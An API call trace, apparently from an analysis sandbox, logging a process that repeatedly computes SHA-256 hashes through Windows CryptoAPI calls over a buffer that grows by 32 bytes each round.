	[0216.956] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.956] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0216.956] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735758
	[0216.956] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735758, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735758, pdwDataLen=0x1284a8) returned 1
	[0216.956] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.956] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.956] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.957] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.957] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0216.957] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.957] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735730
	[0216.957] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735730, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735730, pdwDataLen=0x1284a8) returned 1
	[0216.957] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.957] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.957] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.957] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.957] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0216.957] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.957] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27357d0
	[0216.957] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27357d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27357d0, pdwDataLen=0x1284a8) returned 1
	[0216.958] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.958] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.958] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.958] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.958] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0216.958] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735780
	[0216.958] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735780, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735780, pdwDataLen=0x1284a8) returned 1
	[0216.958] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.958] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.958] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.958] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.958] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0216.958] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.959] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733138
	[0216.959] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2733138, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2733138, pdwDataLen=0x1284a8) returned 1
	[0216.959] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.959] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.959] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.959] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.959] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0216.959] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.959] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733160
	[0216.959] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2733160, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2733160, pdwDataLen=0x1284a8) returned 1
	[0216.959] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.959] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.959] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.959] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.960] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0216.960] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.960] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27357f8
	[0216.960] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27357f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27357f8, pdwDataLen=0x1284a8) returned 1
	[0216.960] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.960] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.960] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.960] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.960] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0216.960] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.960] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735820
	[0216.960] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735820, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735820, pdwDataLen=0x1284a8) returned 1
	[0216.960] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.960] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.960] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.961] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.961] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0216.961] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735848
	[0216.961] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735848, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735848, pdwDataLen=0x1284a8) returned 1
	[0216.961] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.961] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.961] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.961] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.961] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0216.961] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735870
	[0216.961] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735870, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735870, pdwDataLen=0x1284a8) returned 1
	[0216.961] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.961] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.961] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.962] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.962] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0216.962] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735898
	[0216.962] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735898, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735898, pdwDataLen=0x1284a8) returned 1
	[0216.962] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.962] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.962] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.962] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.962] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0216.962] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27358c0
	[0216.962] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27358c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27358c0, pdwDataLen=0x1284a8) returned 1
	[0216.962] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.962] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.962] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.963] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.963] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0216.963] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27358e8
	[0216.963] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27358e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27358e8, pdwDataLen=0x1284a8) returned 1
	[0216.963] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.963] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.963] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.963] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.963] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0216.963] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735910
	[0216.963] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735910, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735910, pdwDataLen=0x1284a8) returned 1
	[0216.963] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.963] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.963] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.964] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.964] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0216.964] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735938
	[0216.964] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735938, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735938, pdwDataLen=0x1284a8) returned 1
	[0216.964] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.964] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.964] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.964] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.964] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0216.964] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735960
	[0216.964] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735960, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735960, pdwDataLen=0x1284a8) returned 1
	[0216.964] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.964] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.964] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.965] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.965] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0216.965] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735988
	[0216.965] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735988, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735988, pdwDataLen=0x1284a8) returned 1
	[0216.965] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.965] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.965] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.965] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.965] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0216.966] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27359b0
	[0216.966] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27359b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27359b0, pdwDataLen=0x1284a8) returned 1
	[0216.966] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.966] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.966] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.966] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.966] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0216.966] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27359d8
	[0216.966] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27359d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27359d8, pdwDataLen=0x1284a8) returned 1
	[0216.966] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.966] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.966] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.967] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.967] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0216.967] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735a00
	[0216.967] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735a00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735a00, pdwDataLen=0x1284a8) returned 1
	[0216.967] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.967] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.967] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.967] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.967] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0216.967] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735a28
	[0216.967] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735a28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735a28, pdwDataLen=0x1284a8) returned 1
	[0216.967] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.967] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.967] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.968] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.968] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0216.968] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735a50
	[0216.968] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735a50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735a50, pdwDataLen=0x1284a8) returned 1
	[0216.968] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.968] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.968] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.968] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.968] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0216.968] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735a78
	[0216.968] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735a78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735a78, pdwDataLen=0x1284a8) returned 1
	[0216.968] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.968] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.968] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.969] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.969] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0216.969] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735aa0
	[0216.969] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735aa0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735aa0, pdwDataLen=0x1284a8) returned 1
	[0216.969] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.969] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.969] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.969] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.969] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0216.969] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735ac8
	[0216.969] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735ac8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735ac8, pdwDataLen=0x1284a8) returned 1
	[0216.969] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.969] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
